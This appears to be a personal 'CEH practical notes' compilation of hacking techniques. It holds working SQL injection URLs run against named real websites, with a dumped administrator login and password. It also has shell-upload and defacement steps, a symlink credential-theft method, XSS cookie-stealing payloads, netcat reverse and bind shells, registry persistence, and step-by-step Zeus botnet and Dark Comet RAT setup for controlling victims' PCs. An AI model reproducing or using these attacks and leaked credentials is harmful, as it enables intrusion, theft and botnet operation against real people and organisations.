www.geca.ac.in/departments/hod.php?id=-14 /**//*!12345union
select*//**/1,2,3,4,@@version,6,7,8,9
Version = 5.1.57-rel12.8-log
=====================================================================
Finding Tables :
http://www.geca.ac.in/departments/hod.php?id=-
14+/**//*!12345union+select*//**/1,2,3,4,table_name,6,7,8,9+from+/*!information_schema.tabl
es*/+where+/*!table_schema*/+like+database()
about_aurangabad
admin_login
album
assignment
login
---------------------------------------------------------------------------------------------------
Finding Tables Using Limit :
http://www.geca.ac.in/departments/hod.php?id=-
14+/**//*!12345union+select*//**/1,2,3,4,table_name,6,7,8,9+from+/*!information_schema.tabl
es*/+where+/*!table_schema*/+like+database()+limit+1,1
Limit increment like -> 1,1
1,2
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
1,3
1,4
etc
admin_login --------------> 0x61646d696e5f6c6f67696e
=====================================================================
http://www.geca.ac.in/departments/hod.php?id=-
14+/**//*!12345union+select*//**/1,2,3,4,column_name,6,7,8,9+from+/*!information_schema.c
olumns*/+where+/*!table_name*/+like+0x61646d696e5f6c6f67696e
admin_id
user_name
pass_word
fname
lname
backpage
----------------------------------------------------------------------------------------------------
Using Limit :
http://www.geca.ac.in/departments/hod.php?id=-
14+/**//*!12345union+select*//**/1,2,3,4,column_name,6,7,8,9+from+/*!information_schema.c
olumns*/+where+/*!table_name*/+like+0x61646d696e5f6c6f67696e+limit+1,1
Limit increment like -> 1,1
1,2
1,3
1,4
etc
user_name
=====================================================================
http://www.geca.ac.in/departments/hod.php?id=-
14+/**//*!12345union+select*//**/1,2,3,4,admin_id,6,7,8,9+from+admin_login
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
admin_id = 1
---------------------------------------------------------------------------------------------------------------------
http://www.geca.ac.in/departments/hod.php?id=-
14+/**//*!12345union+select*//**/1,2,3,4,user_name,6,7,8,9+from+admin_login
user_name = admin@325
---------------------------------------------------------------------------------------------------------------------
http://www.geca.ac.in/departments/hod.php?id=-
14+/**//*!12345union+select*//**/1,2,3,4,pass_word,6,7,8,9+from+admin_login
pass_word = z9xexTqZk%+-328123z9xexTqZk%+-328123
---------------------------------------------------------------------------------------------------------------------
http://www.geca.ac.in/departments/hod.php?id=-
14+/**//*!12345union+select*//**/1,2,3,4,fname,6,7,8,9+from+admin_login
fname = shriram
---------------------------------------------------------------------------------------------------------------------
http://www.geca.ac.in/departments/hod.php?id=-
14+/**//*!12345union+select*//**/1,2,3,4,lname,6,7,8,9+from+admin_login
lname = chaudhari
---------------------------------------------------------------------------------------------------------------------
http://www.geca.ac.in/departments/hod.php?id=-
14+/**//*!12345union+select*//**/1,2,3,4,email,6,7,8,9+from+admin_login
email = [email protected]
---------------------------------------------------------------------------------------------------------------------
http://www.geca.ac.in/departments/hod.php?id=-
14+/**//*!12345union+select*//**/1,2,3,4,backpage,6,7,8,9+from+admin_login
backpage =index.php
---------------------------------------------------------------------------------------------------------------------
3. Xpath Injection http://zerofreak.blogspot.in/2012/02/tutorial-by-zer0freak-zer0freak-sqli.html
Step 1: Inject --> +and extractvalue(rand(),concat(0x0a,version()))--
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
Eg:
http://www.viratcooker.com/recipe.php?ID=3+and%20extractvalue(rand(),/*!concat*/(0x0a,vers
ion()))--
msg: Could not query:XPATH syntax error: ' 5.5.32-cll'
=====================================================================
Step 2: [Find Tables] Inject --> +and extractvalue(rand(),concat(0x0a,(select
concat(0x3a,table_name) from information_schema.tables WHERE table_schema=database()
limit 0,1)))--+
Eg: www.viratcooker.com/recipe.php?ID=3+and
extractvalue(rand(),/*!concat*/(0x0a,(/*!select*/ /*!concat*/(0x3a,table_name) from
/*!information_schema.tables*/ /*!WHERE*/ /*!table_schema=database()*/ limit 0,1)))--+
msg: Could not query:XPATH syntax error: ' :RecipeIngredients'
-----------------------------------------------------------------------
Note : Set --> [ limit 0,1 ] in above query to 1,2,3,4...
Eg: www.viratcooker.com/recipe.php?ID=3+and
extractvalue(rand(),/*!concat*/(0x0a,(/*!select*/ /*!concat*/(0x3a,table_name) from
/*!information_schema.tables*/ /*!WHERE*/ /*!table_schema=database()*/ limit 1,1)))--+
msg: Could not query:XPATH syntax error: ' :SS_categories'
------------------------------------------------------------------------
Respectively :~ For 2,3,4,5,6,7,8.....
msg : Could not query:XPATH syntax error: ' :SS_ordered_carts'
Could not query:XPATH syntax error: ' :SS_orders'
Could not query:XPATH syntax error: ' :SS_products'
Could not query:XPATH syntax error: ' :SS_products2'
Could not query:XPATH syntax error: ' :SS_special_offers'
Could not query:XPATH syntax error: ' :categories'
Could not query:XPATH syntax error: ' :details'
Could not query:XPATH syntax error: ' :productrange'
Could not query:XPATH syntax error: ' :recipes'
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
Could not query:XPATH syntax error: ' :visitors'
=====================================================================
Note : Convert table name to HEX [String to hex conversion]
Eg : details : 64657461696c73 or 0x64657461696c73
=====================================================================
Step 3: [Finding Columns] Inject --> +and extractvalue(rand(),concat(0x0a,(select
concat(0x3a,column_name) from information_schema.columns WHERE
table_name=0x64657461696c73 limit 0,1)))--+
Eg: www.viratcooker.com/recipe.php?ID=3+and
extractvalue(rand(),/*!concat*/(0x0a,(/*!select*/ /*!concat*/(0x3a,column_name) from
/*!information_schema.columns*/ /*!WHERE*/ /*!column_name=0x64657461696c73*/ limit
0,1)))--+
msg: Could not query:XPATH syntax error: ' :cust_firstname'
----------------------------------------------------------------
Note : Set --> [ limit 0,1 ] in above query to 1,2,3,4...
Respectively :~ For 2,3,4,5,6,7,8.....
msg: Could not query:XPATH syntax error: ' :cust_lastname'
msg: Could not query:XPATH syntax error: ' :cust_country'
msg: Could not query:XPATH syntax error: ' :cust_zip'
msg: Could not query:XPATH syntax error: ' :cust_state'
msg: Could not query:XPATH syntax error: ' :cust_city
msg: Could not query:XPATH syntax error: ' :cust_address'
msg: Could not query:XPATH syntax error: ' :cust_phone'
=====================================================================
Note : I got
Table -> users
Columns -> Password & Email
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
So,
=====================================================================
Step 4: Fetching Details Inject ---> +and extractvalue(rand(),concat(0x0a,(select
concat(email,0x3a,password) from users limit 0,1)))--+
Eg: www.viratcooker.com/recipe.php?ID=3+and
extractvalue(rand(),/*!concat*/(0x0a,(/*!select*/ /*!concat*/(email,0x3a,password) from
/*!users*/ limit 0,1)))--+
msg: Could not query:XPATH syntax error: ' :email:password'
=====================================================================
4. DNN Portal Hacking 1 : inurl:tabid/176/Default.aspx
2 : inurl:"/portals/0/" site:.com
3 : inurl:/tabid/36/language/en-US/Default.aspx
4 : inurl:/portals/0/default.aspx
5 : DNN(Link Gallary)
6 : inurl:/tabid/36/language/en-US/Default.aspx
7 : inurl:fcklinkgallery.aspx
step 1 : http://www.parallax.com/tabid/768/productid/92/default.aspx [ Find a website with
above vanulabilities ]
> Replace : /tabid/768/productid/92/default.aspx
> With : /Providers/Htmleditorproviders/fck/fcklinkgallery.aspx
step 2 : http://www.parallax.com/Providers/Htmleditorproviders/fck/fcklinkgallery.aspx
step 3 : click on File (A File On Your Site) and then replace the link with -->
javascript:__doPostBack('ctlURL$cmdUpload','')
step 4 : up will see the uploading button. Upload { shell , Deface it , put your signature}
step 5: http://www.parallax.com/portals/0/shadow.txt
5. Simlink Attack
1] Upload shell 404.php on your hacked website and root the webserver.
2] Upload contact.php & database.php
> eg : http://getec.com.ar/wp-content/plugins/akismet/database.php
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
> eg : http://getec.com.ar/wp-content/plugins/akismet/contact.php
3] go to [sec. info] in your shell then [readable : etc/passwd <view>]
4] copy all username & passwd from [ etc/passwd ]
5] paste in [ http://site.com/contact.php ] [ config fucker ] tab.
6] now open your both links : [ http://site.com/database.php & http://site.com/configweb ]
> eg : http://getec.com.ar/wp-content/plugins/akismet/database.php
> eg : http://getec.com.ar/wp-content/plugins/akismet/configweb/
7] on configweb page [ you have some text that contain user & password ] [ these files are
reverse or linked website details ]
8] Now login to them using database.php [ change password in database ]
9] login to main site then and deface there index.php page.
6. XSS
1. <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
2. <IMG SRC="javascript:alert('XSS');">
3. <IMG SRC=javascript:alert('XSS')>
4. <IMG SRC=JaVaScRiPt:alert('XSS')>
5. <IMG SRC=JaVaScRiPt:alert('XSS')>
6. <IMG SRC=javascript:alert("XSS")>
7. <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
8. <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
10. <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
11. <IMG
SRC=javascript:al

1;rt('XSS')>
12. <IMG
SRC=javascri&#
0000112t:alert(
'XSS')>
13. <IMG SRC="javascript:alert('XSS');">
==========================================================================
Hands On Series – Cross Site Scripting (XSS) Part 1
In this episode we start dealing with Cross Site Scripting (XSS) attacks.
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
CSS = Cascading Style Sheets
XSS = Cross Site Scripting
Cross Site Scripting is a technique used to add script to a trusted site that will be executed on other users
browsers.
A key element to XSS is that one user can submit data to a website that will later be displayed for other
users.
It is nessesary that the bad guy NOT mess up the HTML structure, otherwise the result will be web
defacement rather then attacking other users.
The hackme site has been updated and improved (more about that in a moment)
and now includes a section for XSS which we will be using in this episode.
As usual, for the “Hands on Series” I recommend that you listen to these episodes while viewing the
hacking test site and
have the show notes visible and ready to cut and paste from.
If we look at the source for the page we will see this:
Lets start by trying to somehow add an attribute so that when someone mouses over the name, the
javascript will be executed.
----------------------------------------------------------------------------------------------------------------------------
Attack #1 – Against Email Address
=================================
Attack 1: Original
<a href=”mailto:[email protected]“>John Doe</a>
Attack 1: Desired addition
onmouseover=”alert(„Hacked‟);”
Attack 1: Desired Result
<a href=”mailto:[email protected]” onmouseover=”alert(„Hacked‟);”>Bob Smith</a>
Attack 1: Attack String
[email protected]” onmouseover=”alert(„Hacked‟);
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
Attack 1: Actual Result
<a href=”mailto:[email protected]” onmouseover=”alert(„Hacked‟);”>Bob Smith</a>
Sucess! Mouse over the Name you entered and you see a popup that says “I hacked you”.
At this point we have proven that we can insert code onto the site and have it executed by a web
browser!
This attack is only executed based on a user event (the user mousing over the link)
Lets try creating a script tag, which will get executed while the page is loaded by the browser (so
basically right away).
-----------------------------------------------------------------------------------------------------------------------------
Attack #2 – Against Email Address
=================================
Attack 2: Original
<a href=”mailto:[email protected]“>John Doe</a>
Attack 2: Desired addition
<script>alert(„Hacked‟);</script>
Attack 2: Desired Result
<a href=”mailto:[email protected]”><script>alert(„Hacked‟);</script><”>Bob Smith</a>
Attack 2: Attack String
[email protected]”><script>alert(„Hacked‟);</script><”
Attack 2: Actual Result
<a href=”mailto:[email protected]”><script>alert(„Hacked‟);</script><”“>Bob
Smith</a>
Failure! No popup takes place.
Notice the Actual Result does not match the Desired Result.
This is because of htmlentities as mentioned in the helper notes.
-----------------------------------------------------------------------------------------------------------------------------
Attack #3 – Against Title
=========================
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
Attack 3: Original
<td>Works Great</td>
Attack 3: Desired addition
<script>alert(„Hacked‟);</script>
Attack 3: Desired Result
<td><script>alert(„Hacked‟);</script></td>
Attack 3: Attack String
Works Great<script>alert(„Hacked‟);</script>
Attack 3: Actual Result
<td>Works Great<script>alert('Hacked');</script></td>
Failure! No popup takes place.
This almost worked, except that the single and double quotes get escaped, so lets try making something
that doesnt need quotes.
-----------------------------------------------------------------------------------------------------------------------------
Attack #4 – Against Title
=========================
In the alert function lets use the global variable document.domain in the attack string.
Attack 4: Attack String
Works Great<script>alert(document.domain);</script>
Attack 4: Actual Result
<td>Works Great<script>alert(document.domain);</script></td>
Success! A popup should appear that says hackme.ntobjectives.com
Maybe this isnt convincing enough… lets try cookies.
-----------------------------------------------------------------------------------------------------------------------------
Attack #5 – Against Title
=========================
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
Attack 5: Attack String
Works Great<script>alert(document.cookie);</script>
Attack 5: Actual Result
<td>Works Great<script>alert(document.cookie);</script></td>
Success! A popup should appear that shows all your cookie data.
Theres nothing stopping the hacker from having the user send this data to their server.
I have setup a page for displaying inputs sent to it, but it makes sure to escape characters to make sure
this isnt an attack point.
http://hackme.ntobjectives.com/xss/bin.php
Try it now
http://hackme.ntobjectives.com/xss/bin.php?abc=123
You should be shown that abc=123
This page will display anything you put in the GET params.
I want to push your cookie data over to my site, so that I can attempt a session take over.
-----------------------------------------------------------------------------------------------------------------------------
Attack #6 – Against Title
=========================
Attack 6: Original
<td>Works Great</td>
Attack 6: Desired addition
<script>window.location=‟http://hackme.ntobjectives.com/xss/bin.php?var=‟+document.cookie;</script
>
We have already established that I cannot insert those single quotes that I need around the URL, so we
need to enter into a little more advanced methods.
Using the javascript function String.fromCharCode allows me to get around needing quotes by turning
each decimal value into its character, and it doesnt require any quotes.
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
So we just convert our desired string into decimal first
This:
http://hackme.ntobjectives.com/xss/bin.php?var=
becomes:
104,116,116,112,58,47,47,104,97,99,107,109,101,46,109,105,103,104,116,121,115,101,101,107,46,
99,111,109,47,120,115,115,47,98,105,110,46,112,104,112,63,118,97,114,61
and the attack string becomes
Attack 6: Attack String
Works
Great<script>window.location=String.fromCharCode(104,116,116,112,58,47,47,104,97,99,107,109,101
, 46,109,105,103,104,116,121,115,101,101,107,46,99,111,109,47,120,115,115,47,98,
105,110,46,112,104,112,63,118,97,114,61)+document.cookie;</script>
Attack 6: Actual Result
<td>Works
Great<script>window.location=String.fromCharCode(104,116,116,112,58,47,47,104,97,99,107,109,101
, 46,109,105,103,104,116,121,115,101,101,107,46,99,111,109,47,120,115,115,47,98,
105,110,46,112,104,112,63,118,97,114,61)+document.cookie;</script></td>
Success! Your browser should be sitting on http://hackme.ntobjectives.com/xss/bin.php and showing
you all the data from your cookies.
If this were an attackers site, it would just collect the info and pass you back to the page you came from,
and its unlikely you would have ever noticed that your session information had been stolen.
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
7. Shell Uploading & Defacement
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
8. PHP Disclosing [ site.com/a.php?id=index.php ] [ Disclose index.php ]
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
9. Manipulating Parameters Step1 : open site and search for hidden elements...
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
Step2 : Change the hidden elements value using temper data or developer toolkit [
Firefox add-ons ]
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
10. Dictionary Attack
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
11. Heart bleed
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
12. DNS Zone Transfer
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
13. Brute Force Attack Against SCADA Systems
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
System Hacking 1. ADS [AlterNet Data Streaming]
Practical Guide to Alternative Data Streams in NTFS step1 : type "tab.mp4" >C:\hack\tab.mp4:tab.mp4
go to location --> C:\hack\
type command : i. dir -> it show all stuff in directory then conform that tab.mp4 has been made with 0kb
size.......then ,
ii. start vlc tab.mp4:tab.mp4
To deduct ads file use (Only recovery tools can find these files): i. ADS Spy v1.11
ii. get my data back
2. System Password Hacking & Cracking ophCrack (Crack password)
John The Ripper (Crack password)
Cain & Able (Crack password)
slax work (Crack password)
hiren boot cd (Remove password)
ERD commander (till win 7) [reset password & repair & recovery of windows form boot
sector virus] (Remove password)
Saminside [windows tool] [U can dump any sam file to it for cracking] (Remove password)
Kon-Boot (Login Page Bypassing)
3. Back Doors
1. Win-XP
> c:windows/system32
> copy CMD.EXE
> Change Name to " sethc.exe "
> Put back sethc.exe to " system32 " folder
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
2. Win-7
> c:windows/system32
> look for " ULTRAMAN.EXE " change its permission , ownership and name .
> copy cmd .exe to desktop and rename it to " ULTRAMAN.EXE " put back it in
system32 folder.
NOW :
> at login page press shift 5 times.
> cmd will pop up type command
> net user <username> /del , /add , * [ remove and reset password ]
3. NetCat : [ Netcat can simply be described as a tool that can read and write to
TCP and UDP ports. This dual functionality suggests that Netcat runs in two
modes:“client” and “server”. ]
I. Connect to TCP/UDP Ports
> localhost ~ # nc -h [ Help ]
> localhost ~ # nc -vv www.site.com 22 [ nc -vv <site> <port> ]
Bind Shell
> Victim / User1 :
> C:\>nc -lvvp 4444 -e cmd.exe
> Attacker / User2 :
> BT ~ # nc -v 192.168.0.198 4444 [ User1 "cmd" comes to User2 ]
Reverse Shell
> User1 :
> C:\>nc -lvvp 4444
> User2 :
> BT ~ # nc -v 192.168.0.198 4444 -e /bin/bash [ Now, User2 is sending
his "shell" to User1 ]
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
Uploading Netcat After Hacking With Metasploit :
meterpreter > upload /pentest/windows-binaries/tools/nc.exe c:\\WINDOWS\\SYSTEM32\\
meterpreter > reg enumkry -k HKLM\\software\\Microsoft\\Windows\\CurrentVersion\\Run
meterpreter > reg setval -k HKLM\\software\\Microsoft\\Windows\\CurrentVersion\Run -v
NETCAT -d C:\\WINDOWS\\system32\\nc.exe" -L -d -p 1234 -e cmd.exe"
meterpreter > reg enumkey -k HKLM\\software\\Microsoft\\Windows\\CurrentVersion\\Run
Note : Netcat can be installed in win xp,vista,7 [ Once netcat is installed
sucessfully on victim os no need to exploit use commands :]
root@bt:~# nc <victim ip> <port>
root@bt:~# nc 192.168.217.141 1234
4. Steganography
1. hiding text on image
> run
> cmd
> cd desktop
> copy /b image.jpg+password.txt final_image.jpg
2. OpenPuff
> Freeware, 256-bit multi-encryption, Carrier chains, Multi-layered obfuscation
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
5. Detect Steganography
Backtrack Forensics: Steganoghraphy
Menu: Forensics -> Forensic Analysis Tools
Directory: /usr/local/bin/
stegbreak
stegcompare
stegdeimage
stegdetect
stegdecect is a tool to detect steganography in image files, it supports different methods, which
used to hide content. Currently, the detectable schemes are: jsteg, jphide (unix and windows),
invisible secrets, outguess 01.3b, F5 (header analysis), appendX and camouflage. Stegbreak is
used to launch dictionary attacks against JSteg-Shell, JPHide and OutGuess 0.13b.
Before we start to use the tools we need an image, which has some hidden content. Let's review a
few hiding apps before using stegdetect. As I didn't found any preinstalled in BT, so I installed
steghide for first, which can hide content in jpeg, bmp, wav, au files.
Using steghide:
apt-get install steghide - installation
steghide --info IMG_4422.JPG - get info from the image (how much data can be hidden)
steghide --embed -ef mysecret.txt -cf IMG_4422.JPG -sf steg.jpg -p mypass -Z - hide
mysecret.txt with password "mypass", and create a new file, where the file is hidden, and don't
compress data
steghide --embed -ef mysecret.txt -cf IMG_4422.JPG -sf steg.jpg -p mypass - same as the
previous but w/ compression
steghide --extract -xf mysecret2.txt -sf steg2.jpg -p mypass - extract the file
The bad news is that stegdetect won't detect steghide algorithm. Despite the fact, I tried it to ses
what happens.
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
Using stegdetect:
stegdetect -t [list of tests] steg.jpg - where tests can be (by default jopifa enabled):
j - Tests if information has been embedded with jsteg.
o - Tests if information has been embedded with outguess.
p - Tests if information has been embedded with jphide.
i - Tests if information has been hidden with invisible secrets.
f - Tests if information has been hidden with F5.
F - Tests if information has been hidden with F5 using a more sophisticated but fairly slow
detection algorithm.
a - Tests if information has been added at the end of file, for example by camouflage or
appendX.
stegdetect -s[number] steg.jpg - setting sensitivity
Actually setgdetect found jphide for the original and the created image as well, so it's clearly
false positive.
I tried to see what stegbreak can do, and created a list of password where I put only one line, the
correct password.
stegbreak -f passlist.txt steg.jpg
I got the following error: "stegbreak: fopen: /usr/local/share/stegbreak/rules.ini: No such file or
directory"
I downloaded the source and placed the ini file in the said location, but you can also download it
from here.
After that I got a "Segmentation fault" error. I couldn't find a working solution for this problem,
however it's a known bug.
Second I tried outguess, which can hide info in jpeg files.
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
Using Outguess :
apt-get install outguess
outguess -k "mypass" -d index.html IMG_4422.JPG out2.jpg - hides index.html in
IMG_4422.JPG
Unfortunately stegdetect doesn't detect the hidden file (probably because I used outguess v2),
even if increasing the sensitivity, as you can see:
My last try was with jphide, I used the windows version, as had no luck with installing the one
for Linux. It can be downloaded from here.
As you can see stegdetect can detect it, when increasing sensitivity, but as it claims the same
thing for the original image, so...
stegcompare can compare the original and the image which stores information, but I couldn't
figure out what the output means.
tegdeimage - not sure about what it should do, also gives the following error:
"/home/stego_analysis/compress/dscf0033.jpg : error: No such file or directory"
looking at the source code:
73 if (jpg_open("/home/stego_analysis/compress/dscf0033.jpg") == -1)
74 return;
it is clear that it will never run, unless you have such an image.
Overall I'm not really convinced by the stegdetect toolset, it's buggy, and doesn't really find
steganography correctly.
Official website for steghide: http://steghide.sourceforge.net/
Official website for stegdetect and outguess: http://www.outguess.org/
Official website for jphide: http://linux01.gwdg.de/~alatham/stego.html
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
Stegdetect :
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
Steghide :
stegcompare :
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
outguess :
6. Bypassing Login Page Windows With Backtrack
Make a bootable backtrack pendrive
Boot the system and open backtrack
Open Terminal
mkdir /root/Desktop/p7771 [ Create any folder ]
fdisk -l
mount /dev/sda2 /root/Desktop/p7771 [ Mount Your windows C-Drive ]
ls -la /root/Desktop/p7771/
cd /pentest/password/chntpw
./chntpw -i Desktop/p7771/Windows/System32/config/sam
Press - 1 [ Edit User Data And Password ]
Press - 1 [ Clear Blank User Password ]
Press - q [ Quit ]
Press - y [ Write hive file ? ]
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
Malwares 1. Botnet I ] How To Find Cpanel :
A] we need a compromised website with Symlink attack eg :
link:www.site.com/akismet/configweb [ it has all password files ]
1] python cracker.py http://www.pjmi.net/wp-content/plugins/akismet/configweb/
'/root/Desktop/ab' [ copy all password to ab folder from compromised Symlink website ]
2] upload cpanal.php to your shell.
3] copy all password to your cpanal.php
4] run command on your previous shell "eg: wso.php" for user name ---> ls /var/mail
5] copy all user to your cpanel.php
6] click on start it will show you list of active cpanel
7] find website from reverse ip lookup
8] default port for cpanel :2082 [ www.site.com:2082 ]
II ] Configuring Zeus Botnet :
A ] Creating IRC Server :
1] open c-panel
2] go into public folder
3] create folder [ Eg : XXX ]
4] upload your IRC scripts [Zeus.rar in your cpanal to make your cpanal an IRC
Server ]
5] extract the Zeus.rar to server.
6] open www.site.com/XXX/install/index.php
NOW : Now we will setup a database and link it with our IRC server.
B ] Creating Database :
7] go into cpanel & click into my sql database wizard
8] crate a new database and user
Eg : Yahoo >> Next
Eg : User Name = yahoo
Eg : Password = Click on " Generate Password " [ Copy/Rembember [ User Name & Password ]
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
9] Click on create user.
10] Go to = www.site.com/XXX/install/index.php
> give password that has been generated.
11] Come back to your database page and assign/give permision or click on all
privilidge.
12] Copy username & database name and go to -->
www.site.com/XXX/install/index.php [ Under Mysql Server ]
> give the user name.
> give the database name.
13] Click on next step [ Database will be created and linked with IRC server ]
14] Now for login in botnet panel we have to give : password [ Eg:abc123 ]in -->
www.site.com/XXX/install/index.php [ Under Root User ] [ By default user will be "admin" ]
15] Now create encryption key Eg : 123123 [ Under Options : ]
16] Before Pressing " install " [ In www.site.com/XXX/install/index.php ] go
back to your folder " XXX " [ Where you have uploaded your IRC ]
> Right click on --> system [ Folder ]
> Change Permission to --> 777 [Read-Write-Exicute]
17] Go back to control panel [ www.site.com/XXX/install/index.php ] Press "
Install "
18] Now go to --> www.site.com/XXX/cp.php
> Username = admin
> Password = abc123
C ] Configuring Bot :
19] Open & Extract "client.rar" .
20] Run "gzero.exe"
21] Click On Builder > click on " edit ".
> configuration file of bot will be opened.
> replace all links with your server path -- > www.site.com/XXX/
> Eg. http://www.rumahbaut.com/xxx/cfg.bin ----->
http://www.site.com/xxx/cfg.bin
> Eg. http://www.rumahbaut.com/xxx/tr.exe ------>
http://www.site.com/xxx/tr.exe
> Eg. http://www.rumahbaut.com/xxx/gate.php --->
http://www.site.com/xxx/gate.php
> Eg. http://www.rumahbaut.com/xxx/cfg1.bin ----->
http://www.site.com/xxx/cfg1.bin
> Eg. Encryption key = 1221421412 ------> Your encryption key [ 12312]
22] Click on " BUILD THE BOT CONFIGURATION " name Eg. BOT
Then ,
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
23] Click on " BUILD THE BOT EXECUTABLE " name Eg. tr.exe
D] Uploading The Bot :
24] Go to your IRC server folder where u uploaded & Extracted your zeus.rar file
[ www.site.com/ ]
25] Upload Both file that u have created "BOT" & "tr.exe"
NOTE : If doesn't UPLOAD : Try to compress and upload OR UPLOAD Both bot from your
shell. [wso.php]
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
2. Virus Virus Creator
Sonic Bat
TeraBit
Infection Virus Maker
Deadline Virus Maker
JPS Virus Maker
Jkymmel Batch Virus Creator
WolfDEM's
Virus Matic
Necro Virus Maker
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
3. Trojans [ Top Ten RAT ( Remote Administrative Tools ) ] Dark Comet [ Setting Up Dark Comet RAT ]
1. Run client.exe
> allow connection
> Edit Server
> main setting
> connection setting
> Ip: Get local IP < Your IP>
> port : <any>
> Server Setup
> melt server
> Server Shield
> Anti Virtual Box
> Icon Setting
> Generate Server
> active keylogger
> create server
> click on connection.
> port listining mode
2. Give app to victim
3. Control Its PC
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
Black Shades
JSpy
Pussy RAT
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
Bozok RAT
Poison lvy Rat
Nj Rat
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
DameWare RAT
jRAT
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
Cyber Gate
4. Worms
A worm is similar to a virus by design and is considered to be a sub-class of a virus. Worms
spread from computer to computer, but unlike a virus, it has the capability to travel without any
human action. A worm takes advantage of file or information transport features on your system,
which is what allows it to travel unaided.
The biggest danger with a worm is its capability to replicate itself on your system, so rather than
your computer sending out a single worm, it could send out hundreds or thousands of copies of
itself, creating a huge devastating effect. One example would be for a worm to send a copy of
itself to everyone listed in your e-mail address book. Then, the worm replicates and sends itself
out to everyone listed in each of the receiver's address book, and the manifest continues on down
the line.
Due to the copying nature of a worm and its capability to travel across networks the end result in
most cases is that the worm consumes too much system memory (or network bandwidth),
causing Web servers, network servers and individual computers to stop responding. In recent
worm attacks such as the much-talked-about Blaster Worm, the worm has been designed to
tunnel into your system and allow malicious users to control your computer remotely.
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
Penetration testing Types Of Testing :
1. White-Box Testing
2. Black-Box Testing
3. Grey-Box Testing
4. Internal Testing
5. External Testing
Process Of Pen-testing :
1. Information gathering
2. Scanning & Banner Grabbing
3. Vulnerability Scanning
4. Exploitation ( Obtaining Access )
5. Maintaining Access & Erasing Evidence
Tools :
1. Metasploit
2. Core-impact
METASPLOIT
Vulnerability : A weakness that allows an attacker to compromise the secrity of
system.
Exploits : Doing the step by step procedure of gathering information
Payload : the process to gain access which is blocked by user
Encoders : The process to remove tracks.
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
Need for Metasploit
1. difficult to manage, update, customize dozen of exploits available on internet for
different technologies
2. customization of exploits will be time consuming & one also need high skills do
to same
METASPLOIT
Testing framework for Penetration testing contains 1300+exploit
http://cve.mitre.org
rapid7.com
www.exploit-db.com
December 31, 2014
[HACKING IN SHADOW CEH PRACTICAL NOTES]
I. Windows XP
To open Metasploit in kali Linux or backtrack use command : msfconsole
RCE ( Netapi ) ( Remote Code Execution ) [Win XP SP-2,3 -> vulnerable OS]
msfconsole
search netapi
use exploit/windows/smb/ms08_067_netapi [ CVE NO = 067 ]
show options
set RHOST [TARGET IP] -> 192.168.1.20
set PAYLOAD windows/meterpreter/bind_tcp
OR
set PAYLOAD windows/meterpreter/reverse_tcp [ Test other payload also ]
set LHOST 192.168.1.150 [Attacker Ip Address]
set LHOST [MY IP ADDRESS]
